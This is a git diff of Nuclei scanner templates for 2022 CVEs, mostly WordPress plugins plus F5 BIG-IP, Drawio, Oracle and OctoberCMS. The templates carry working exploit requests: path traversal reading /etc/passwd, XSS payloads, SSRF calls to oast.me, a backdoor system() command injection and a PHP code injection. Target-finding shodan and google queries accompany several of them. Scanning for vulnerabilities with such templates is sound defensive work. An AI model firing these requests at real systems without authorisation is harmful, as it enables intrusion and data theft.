+        -----------------------------30259827232283860776499538268
+        Content-Disposition: form-data; name="post_id"
+
+        0
+        -----------------------------30259827232283860776499538268
+        Content-Disposition: form-data; name="field_labels"
+
+        {"email":"Email address"}
+        -----------------------------30259827232283860776499538268
+        Content-Disposition: form-data; name="hidden_field_names"
+
+        []
+        -----------------------------30259827232283860776499538268
+        Content-Disposition: form-data; name="fusionAction"
+
+        https://oast.me
+        -----------------------------30259827232283860776499538268
+        Content-Disposition: form-data; name="fusionActionMethod"
+
+        GET
+        -----------------------------30259827232283860776499538268--
+
+    extractors:
+      - type: xpath
+        part: body_1
+        name: fusionformnonce
+        attribute: value
+        xpath:
+          - '//*[@id="fusion-form-nonce-0"]'
+        internal: true
+
+    req-condition: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body_2
+        words:
+          - 'Interactsh Server'
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-1388.yaml b/cves/2022/CVE-2022-1388.yaml
index ec2987aa1b..824800fadb 100644
--- a/cves/2022/CVE-2022-1388.yaml
+++ b/cves/2022/CVE-2022-1388.yaml
@@ -5,9 +5,7 @@ info:
   author: dwisiswant0,Ph33r
   severity: critical
   description: |
-    This F5 BIG-IP vulnerability can allow an unauthenticated attacker
-    with network access to the BIG-IP system through the management
-    port and/or self IP addresses to execute arbitrary system commands.
+    F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, may allow undisclosed requests to bypass iControl REST authentication.
   reference:
     - https://twitter.com/GossiTheDog/status/1523566937414193153
     - https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/
@@ -15,13 +13,13 @@ info:
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 9.80
+    cvss-score: 9.8
     cve-id: CVE-2022-1388
     cwe-id: CWE-306
   metadata:
     shodan-query: http.title:"BIG-IP&reg;-+Redirect" +"Server"
-    verified: true
-  tags: f5,bigip,cve,cve2022,rce,mirai
+    verified: "true"
+  tags: f5,bigip,cve,cve2022,rce,mirai,kev
 
 variables:
   auth: "admin:"
@@ -64,3 +62,5 @@ requests:
           - "commandResult"
           - "8831-2202-EVC"
         condition: and
+
+# Enhanced by mp on 2022/05/19
diff --git a/cves/2022/CVE-2022-1390.yaml b/cves/2022/CVE-2022-1390.yaml
new file mode 100644
index 0000000000..32c8954e74
--- /dev/null
+++ b/cves/2022/CVE-2022-1390.yaml
@@ -0,0 +1,36 @@
+id: CVE-2022-1390
+
+info:
+  name: WordPress Admin Word Count Column 2.2 - Local File Inclusion
+  author: daffainfo,Splint3r7
+  severity: critical
+  description: |
+    The plugin does not validate the path parameter given to readfile(), which could allow unauthenticated attackers to read arbitrary files on server running old version of PHP susceptible to the null byte technique. This could also lead to RCE by using a Phar Deserialization technique.
+  reference:
+    - https://packetstormsecurity.com/files/166476/WordPress-Admin-Word-Count-Column-2.2-Local-File-Inclusion.html
+    - https://wordpress.org/plugins/admin-word-count-column/
+    - https://wpscan.com/vulnerability/6293b319-dc4f-4412-9d56-55744246c990
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-1390
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-1390
+    cwe-id: CWE-22
+  tags: packetstorm,wpscan,cve,cve2022,wordpress,wp-plugin,lfi,wp
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0'
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/08/01
diff --git a/cves/2022/CVE-2022-1391.yaml b/cves/2022/CVE-2022-1391.yaml
new file mode 100644
index 0000000000..bc1d0889fc
--- /dev/null
+++ b/cves/2022/CVE-2022-1391.yaml
@@ -0,0 +1,36 @@
+id: CVE-2022-1391
+
+info:
+  name: WordPress Cab fare calculator < 1.0.4 - Local File Inclusion
+  author: Splint3r7
+  severity: critical
+  description: |
+    The Cab fare calculator WordPress plugin before 1.0.4 does not validate the controller parameter before using it in require statements, which could lead to Local File Inclusion issues.
+  reference:
+    - https://www.exploit-db.com/exploits/50843
+    - https://wordpress.org/plugins/cab-fare-calculator
+    - https://wpscan.com/vulnerability/680121fe-6668-4c1a-a30d-e70dd9be5aac
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-1391
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-1391
+    cwe-id: CWE-22
+  tags: cve2022,wordpress,wp-plugin,lfi,wp,edb,wpscan,cve
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1'
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/08/01
diff --git a/cves/2022/CVE-2022-1392.yaml b/cves/2022/CVE-2022-1392.yaml
new file mode 100644
index 0000000000..b75a81b595
--- /dev/null
+++ b/cves/2022/CVE-2022-1392.yaml
@@ -0,0 +1,38 @@
+id: CVE-2022-1392
+
+info:
+  name: WordPress Videos sync PDF <=1.7.4 - Local File Inclusion
+  author: Veshraj
+  severity: high
+  description: WordPress Videos sync PDF 1.7.4 and prior does not validate the p parameter before using it in an include statement, which could lead to local file inclusion.
+  reference:
+    - https://wpscan.com/vulnerability/fe3da8c1-ae21-4b70-b3f5-a7d014aa3815
+    - https://packetstormsecurity.com/files/166534/
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-1392
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2022-1392
+  metadata:
+    verified: true
+  tags: lfi,wp-plugin,unauth,wpscan,cve,cve2022,packetstorm,wp,wordpress
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=tout"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "failed to open stream: No such file or directory"
+          - "REPERTOIRE_VIDEOSYNCPDFreglages/Menu_Plugins/tout.php"
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/06/29
diff --git a/cves/2022/CVE-2022-1439.yaml b/cves/2022/CVE-2022-1439.yaml
index 25667b9d92..3649501687 100644
--- a/cves/2022/CVE-2022-1439.yaml
+++ b/cves/2022/CVE-2022-1439.yaml
@@ -1,18 +1,23 @@
 id: CVE-2022-1439
 
 info:
-  name: Microweber Reflected Cross-Site Scripting
+  name: Microweber Cross-Site Scripting
   author: pikpikcu
   severity: medium
   description: Reflected XSS in microweber/microweber prior to 1.2.15. Execute Arbitrary JavaScript as the attacked user. It's the only payload I found working, you might need to press "tab" but there is probably a paylaod that runs without user interaction.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2022-1439
     - https://huntr.dev/bounties/86f6a762-0f3d-443d-a676-20f8496907e0/
+    - https://huntr.dev/bounties/86f6a762-0f3d-443d-a676-20f8496907e0
+    - https://github.com/microweber/microweber/commit/ad3928f67b2cd4443f4323d858b666d35a919ba8
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
     cve-id: CVE-2022-1439
+    cwe-id: CWE-79
   metadata:
     shodan-query: http.favicon.hash:780351152
-  tags: cve,cve2022,microweber,xss
+  tags: cve,cve2022,microweber,xss,huntr
 
 requests:
   - method: GET
diff --git a/cves/2022/CVE-2022-1597.yaml b/cves/2022/CVE-2022-1597.yaml
new file mode 100644
index 0000000000..9af91af4fc
--- /dev/null
+++ b/cves/2022/CVE-2022-1597.yaml
@@ -0,0 +1,63 @@
+id: CVE-2022-1597
+
+info:
+  name: WPQA < 5.4 - Cross-Site Scripting
+  author: veshraj
+  severity: medium
+  description: |
+    The plugin, used as a companion for the Discy and Himer themes,
+    does not sanitise and escape a parameter on its reset password
+    form which makes it possible to perform reflected XSS.
+  reference:
+    - https://wpscan.com/vulnerability/faff9484-9fc7-4300-bdad-9cd8a30a9a4e
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1597
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-1597
+    cwe-id: CWE-79
+  metadata:
+    google-query: inurl:/wp-content/plugins/wpqa
+    verified: "true"
+  tags: wpscan,xss,wordpress,wp-plugin,wp,cve,cve2022,wpqa
+
+variables:
+  user: "{{to_lower(rand_base(5))}}"
+  pass: "{{user}}{{to_lower(rand_base(3))}}"
+  redirect_to: '"><img src=x onerror=alert(document.domain)>'
+
+requests:
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
+        Content-Type: application/x-www-form-urlencoded
+
+        user_name={{user}}&email={{user}}@{{Host}}&pass1={{pass}}&pass2={{pass}}&phone={{rand_text_numeric(10)}}&agree_terms=on&form_type=wpqa-signup&action=wpqa_ajax_signup_process
+
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
+        Content-Type: application/x-www-form-urlencoded
+
+        user_mail={{user}}@{{Host}}&form_type=wpqa_forget&action=wpqa_ajax_password_process&redirect_to={{url_encode(redirect_to)}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{redirect_to}}'
+          - '"success":1'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-1598.yaml b/cves/2022/CVE-2022-1598.yaml
new file mode 100644
index 0000000000..7ba07fced5
--- /dev/null
+++ b/cves/2022/CVE-2022-1598.yaml
@@ -0,0 +1,38 @@
+id: CVE-2022-1598
+
+info:
+  name: WordPress Plugin WPQA < 5.5 - Unauthenticated Private Message Disclosure
+  author: veshraj
+  severity: medium
+  description: |
+    The plugin which is a companion to the Discy and Himer themes, lacks authentication in a REST API endpoint, allowing unauthenticated users to discover private questions sent between users on the site.
+  reference:
+    - https://wpscan.com/vulnerability/0416ae2f-5670-4080-a88d-3484bb19d8c8
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1598
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+    cve-id: CVE-2022-1598
+    cwe-id: CWE-284
+  metadata:
+    google-query: inurl:/wp-content/plugins/wpqa
+    verified: "true"
+  tags: cve,cve2022,wordpress,wp-plugin,wpqa,idor,wpscan
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-json/wp/v2/asked-question'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"id":'
+          - '"rendered":'
+        condition: and
+
+      - type: status
+        status:
+          - 200
\ No newline at end of file
diff --git a/cves/2022/CVE-2022-1609.yaml b/cves/2022/CVE-2022-1609.yaml
new file mode 100644
index 0000000000..83188b53b1
--- /dev/null
+++ b/cves/2022/CVE-2022-1609.yaml
@@ -0,0 +1,39 @@
+id: CVE-2022-1609
+
+info:
+  name: The School Management < 9.9.7 - Remote Code Execution
+  author: For3stCo1d
+  severity: critical
+  description: The School Management plugin before version 9.9.7 contains an obfuscated backdoor injected in it's license checking code that registers a REST API handler, allowing an unauthenticated attacker to execute arbitrary PHP code on the site.
+  reference:
+    - https://wpscan.com/vulnerability/e2d546c9-85b6-47a4-b951-781b9ae5d0f2
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1609
+  metadata:
+    verified: false
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cve-id: CVE-2022-1609
+    cwe-id: CWE-77
+  tags: rce,wp,backdoor,wpscan,cve,cve2022,wordpress
+
+variables:
+  cmd: "echo CVE-2022-1609 | rev"
+
+requests:
+  - raw:
+      - |
+        POST /wp-json/am-member/license HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        blowfish=1&blowf=system('{{cmd}}');
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '9061-2202-EVC'
+
+# Enhanced by mp on 2022/05/27
diff --git a/cves/2022/CVE-2022-1713.yaml b/cves/2022/CVE-2022-1713.yaml
new file mode 100644
index 0000000000..95a34fc4aa
--- /dev/null
+++ b/cves/2022/CVE-2022-1713.yaml
@@ -0,0 +1,41 @@
+id: CVE-2022-1713
+
+info:
+  name: Drawio <18.0.4 - Server-Side Request Forgery
+  author: pikpikcu
+  severity: high
+  description: |
+    Drawio prior to 18.0.4 is vulnerable to server-side request forgery. An attacker can make a request as the server and read its contents. This can lead to a leak of sensitive information.
+  reference:
+    - https://huntr.dev/bounties/cad3902f-3afb-4ed2-abd0-9f96a248de11
+    - https://github.com/jgraph/drawio/commit/283d41ec80ad410d68634245cf56114bc19331ee
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-1713
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2022-1713
+    cwe-id: CWE-918
+  metadata:
+    verified: true
+    shodan-query: http.title:"Flowchart Maker"
+  tags: drawio,ssrf,oss,huntr,cve,cve2022
+
+requests:
+  - raw:
+      - |
+        GET /proxy?url=http%3a//0:8080/ HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>Flowchart Maker & Online Diagram Software</title>"
+
+      - type: word
+        part: header
+        words:
+          - "application/octet-stream"
+
+# Enhanced by mp on 2022/06/29
diff --git a/cves/2022/CVE-2022-1724.yaml b/cves/2022/CVE-2022-1724.yaml
new file mode 100644
index 0000000000..c07b3fa2bf
--- /dev/null
+++ b/cves/2022/CVE-2022-1724.yaml
@@ -0,0 +1,39 @@
+id: CVE-2022-1724
+
+info:
+  name: Simple Membership < 4.1.1 - Cross-Site Scripting
+  author: Akincibor
+  severity: medium
+  description: The plugin does not properly sanitise and escape parameters before outputting them back in AJAX actions, leading to Reflected Cross-Site Scripting.
+  reference:
+    - https://wpscan.com/vulnerability/96a0a667-9c4b-4ea6-b78a-0681e9a9bbae
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-1724
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-1724
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: xss,wp,wordpress,wpscan,cve,cve2022,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=swpm_validate_email&fieldId=%22%3Cscript%3Ealert(document.domain)%3C/script%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"<script>alert(document.domain)</script>",'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-1815.yaml b/cves/2022/CVE-2022-1815.yaml
new file mode 100644
index 0000000000..f7a27e1593
--- /dev/null
+++ b/cves/2022/CVE-2022-1815.yaml
@@ -0,0 +1,34 @@
+id: CVE-2022-1815
+
+info:
+  name: Drawio < 18.1.2 - Server Side Request Forgery
+  author: amit-jd
+  severity: high
+  description: |
+    SSRF in /service endpoint in jgraph/drawio prior to 18.1.2. Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository jgraph/drawio prior to 18.1.2.
+  reference:
+    - https://huntr.dev/bounties/6e856a25-9117-47c6-9375-52f78876902f/
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-1815
+    - https://huntr.dev/bounties/6e856a25-9117-47c6-9375-52f78876902f
+    - https://github.com/jgraph/drawio/commit/c287bef9101d024b1fd59d55ecd530f25000f9d8
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2022-1815
+    cwe-id: CWE-918
+  metadata:
+    verified: "true"
+  tags: huntr,cve,cve2022,drawio,ssrf,oast,oss,jgraph
+
+requests:
+  - raw:
+      - |
+        GET /service/0/test.oast.me HTTP/2
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(body, 'Interactsh Server')"
+          - status_code == 200
+        condition: and
diff --git a/cves/2022/CVE-2022-1904.yaml b/cves/2022/CVE-2022-1904.yaml
new file mode 100644
index 0000000000..2bd23f4c7e
--- /dev/null
+++ b/cves/2022/CVE-2022-1904.yaml
@@ -0,0 +1,40 @@
+id: CVE-2022-1904
+
+info:
+  name: Easy Pricing Tables < 3.2.1 - Cross-Site-Scripting
+  author: Akincibor
+  severity: medium
+  description: |
+    The plugin does not sanitize and escape parameter before reflecting it back in a page available to any user (both authenticated and unauthenticated) when a specific setting is enabled, leading to a reflected cross-site scripting.
+  reference:
+    - https://wpscan.com/vulnerability/92215d07-d129-49b4-a838-0de1a944c06b
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1904
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-1904
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: wp,wordpress,wpscan,cve,cve2022,wp-plugin,xss
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=ptp_design4_color_columns&post_id=1&column_names=<script>alert(document.domain)</script>'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<script>alert(document.domain)</script> - Color'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-1906.yaml b/cves/2022/CVE-2022-1906.yaml
new file mode 100644
index 0000000000..4832265683
--- /dev/null
+++ b/cves/2022/CVE-2022-1906.yaml
@@ -0,0 +1,44 @@
+id: CVE-2022-1906
+
+info:
+  name: Copyright Proof <= 4.16 - Cross-Site-Scripting
+  author: random-robbie
+  severity: medium
+  description: |
+    The plugin does not sanitise and escape a parameter before outputting it back via an AJAX action available to both unauthenticated and authenticated users, leading to a Reflected Cross-Site Scripting when a specific setting is enabled.
+  reference:
+    - https://wpscan.com/vulnerability/af4f459e-e60b-4384-aad9-0dc18aa3b338
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-1906
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1906
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-1906
+    cwe-id: CWE-79
+  metadata:
+    google-query: inurl:/wp-content/plugins/digiproveblog
+    verified: "true"
+  tags: wordpress,xss,wp-plugin,wp,wpscan,cve,cve2022
+
+requests:
+  - raw:
+      - |
+        GET /wp-admin/admin-ajax.php?action=dprv_log_event&message=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "got message <script>alert(document.domain)</script>"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-1937.yaml b/cves/2022/CVE-2022-1937.yaml
new file mode 100644
index 0000000000..185cf13123
--- /dev/null
+++ b/cves/2022/CVE-2022-1937.yaml
@@ -0,0 +1,42 @@
+id: CVE-2022-1937
+
+info:
+  name: Awin Data Feed <= 1.6 - Cross-Site Scripting
+  author: Akincibor,DhiyaneshDK
+  severity: medium
+  description: |
+    The plugin does not sanitise and escape a parameter before outputting it back via an AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected Cross-Site Scripting.
+  reference:
+    - https://wpscan.com/vulnerability/eb40ea5d-a463-4947-9a40-d55911ff50e9
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-1937
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-1937
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve,cve2022,xss,awin,wpscan,wp-plugin,wp,wordpress,authenticated
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+      - |
+        GET /wp-admin/admin-ajax.php?action=get_sw_product&title=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    req-condition: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(all_headers_2, "text/html")'
+          - 'status_code_2 == 200'
+          - contains(body_2, 'colspan=\"2\"><script>alert(document.domain)</script></th>')
+        condition: and
diff --git a/cves/2022/CVE-2022-1946.yaml b/cves/2022/CVE-2022-1946.yaml
new file mode 100644
index 0000000000..ea30e250d9
--- /dev/null
+++ b/cves/2022/CVE-2022-1946.yaml
@@ -0,0 +1,41 @@
+id: CVE-2022-1946
+
+info:
+  name: Gallery < 2.0.0 - Cross-Site Scripting
+  author: Akincibor
+  severity: medium
+  description: The plugin does not sanitise and escape a parameter before outputting it back in the response of an AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected Cross-Site Scripting issue.
+  reference:
+    - https://wpscan.com/vulnerability/0903920c-be2e-4515-901f-87253eb30940
+    - https://wordpress.org/plugins/gallery-album
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1946
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-1946
+    cwe-id: CWE-79
+  metadata:
+    google-query: inurl:"/wp-content/plugins/gallery-album/"
+    verified: "true"
+  tags: wpscan,cve2022,wp,xss,wordpress,gallery,unauth,cve,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=wpda_gall_load_image_info&start=0&limit=1&gallery_current_index=<script>alert(document.domain)</script>'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'wpdevar_gall_img_url_h[<script>alert(document.domain)</script>]'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-21371.yaml b/cves/2022/CVE-2022-21371.yaml
index 10da0f5aa4..261214bd05 100644
--- a/cves/2022/CVE-2022-21371.yaml
+++ b/cves/2022/CVE-2022-21371.yaml
@@ -4,8 +4,7 @@ info:
   name: Oracle WebLogic Server Local File Inclusion
   author: paradessia,narluin
   severity: high
-  description: An easily exploitable local file inclusion vulnerability allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. Supported versions that are affected are
-    12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Successful attacks of this vulnerability can result in unauthorized and sometimes complete access to critical data.
+  description: An easily exploitable local file inclusion vulnerability allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Successful attacks of this vulnerability can result in unauthorized and sometimes complete access to critical data.
   reference:
     - https://www.oracle.com/security-alerts/cpujan2022.html
     - https://nvd.nist.gov/vuln/detail/CVE-2022-21371
diff --git a/cves/2022/CVE-2022-21500.yaml b/cves/2022/CVE-2022-21500.yaml
new file mode 100644
index 0000000000..3f0025ae73
--- /dev/null
+++ b/cves/2022/CVE-2022-21500.yaml
@@ -0,0 +1,41 @@
+id: CVE-2022-21500
+
+info:
+  name: Oracle E-Business Suite <=12.2 - Authentication Bypass
+  author: 3th1c_yuk1,tess
+  severity: high
+  description: |
+    Oracle E-Business Suite (component: Manage Proxies) 12.1 and 12.2 are susceptible to an easily exploitable vulnerability that allows an unauthenticated attacker with network access via HTTP to compromise it by self-registering for an account. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle E-Business Suite accessible data.
+  reference:
+    - https://orwaatyat.medium.com/my-new-discovery-in-oracle-e-business-login-panel-that-allowed-to-access-for-all-employees-ed0ec4cad7ac
+    - https://twitter.com/GodfatherOrwa/status/1514720677173026816
+    - https://www.oracle.com/security-alerts/alert-cve-2022-21500.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-21500
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2022-21500
+  metadata:
+    shodan-query: http.title:"Login" "X-ORACLE-DMS-ECID" 200
+    verified: "true"
+  tags: cve,cve2022,oracle,misconfig,auth-bypass
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/OA_HTML/ibeCAcpSSOReg.jsp'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'Registration'
+          - 'Register as individual'
+          - '<!-- ibeCZzpRuntimeIncl.jsp end -->'
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/06/29
diff --git a/cves/2022/CVE-2022-21705.yaml b/cves/2022/CVE-2022-21705.yaml
new file mode 100644
index 0000000000..b51fabc2db
--- /dev/null
+++ b/cves/2022/CVE-2022-21705.yaml
@@ -0,0 +1,107 @@
+id: CVE-2022-21705
+
+info:
+  name: OctoberCMS Authenticated Remote Code Execution
+  author: iPhantasmic
+  severity: high
+  description: |
+    Octobercms is a self-hosted CMS platform based on the Laravel PHP Framework. In affected versions user input was not properly sanitized before rendering. An authenticated user with the permissions to create, modify and delete website pages can exploit this vulnerability to bypass `cms.safe_mode` / `cms.enableSafeMode` in order to execute arbitrary code. This issue only affects admin panels that rely on safe mode and restricted permissions. To exploit this vulnerability, an attacker must first have access to the backend area.
+  remediation: |
+    The issue has been patched in Build 474 (v1.0.474) and v1.1.10. Users unable to upgrade should apply https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe to your installation manually.
+  reference:
+    - https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe
+    - https://github.com/octobercms/october/security/advisories/GHSA-79jw-2f46-wv22
+    - https://cyllective.com/blog/post/octobercms-cve-2022-21705/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.2
+    cve-id: CVE-2022-21705
+    cwe-id: CWE-74
+  tags: cve,cve2022,authenticated,rce,cms,octobercms,injection
+
+
+requests:
+  - raw:
+      - | # to obtain session_key and token
+        GET /backend/backend/auth/signin HTTP/1.1
+        Host: {{Hostname}}
+
+      - | # to perform authentication and obtain admin cookies
+        POST /backend/backend/auth/signin HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        _session_key={{session_key}}&_token={{token}}&postback=1&login={{username}}&password={{password}}
+
+      - | # to inject php code in Markup editor and perform exploit
+        POST /backend/cms HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        X-OCTOBER-REQUEST-HANDLER: onSave
+        X-OCTOBER-REQUEST-PARTIALS:
+        X-Requested-With: XMLHttpRequest
+
+        _session_key={{session_key}}&_token={{token}}&settings%5Btitle%5D={{randstr}}&settings%5Burl%5D=%2F{{randstr}}&fileName={{randstr}}&settings%5Blayout%5D=&settings%5Bdescription%5D=&settings%5Bis_hidden%5D=0&settings%5Bmeta_title%5D=&settings%5Bmeta_description%5D=&markup=%3C%3Fphp%0D%0A%0D%0Afunction+onInit()+%7B%0D%0A++++phpinfo()%3B%0D%0A%7D%0D%0A%0D%0A%3F%3E%0D%0A%3D%3D%0D%0A&code=&templateType=page&templatePath=&theme=demo&templateMtime=&templateForceSave=0
+
+      - | # to obtain theme
+        POST /backend/cms HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        X-OCTOBER-REQUEST-HANDLER: onCreateTemplate
+        X-OCTOBER-REQUEST-PARTIALS:
+        X-Requested-With: XMLHttpRequest
+
+        _session_key={{session_key}}&_token={{token}}&search=&type=page
+
+      - | # to access the template page for generated exploit
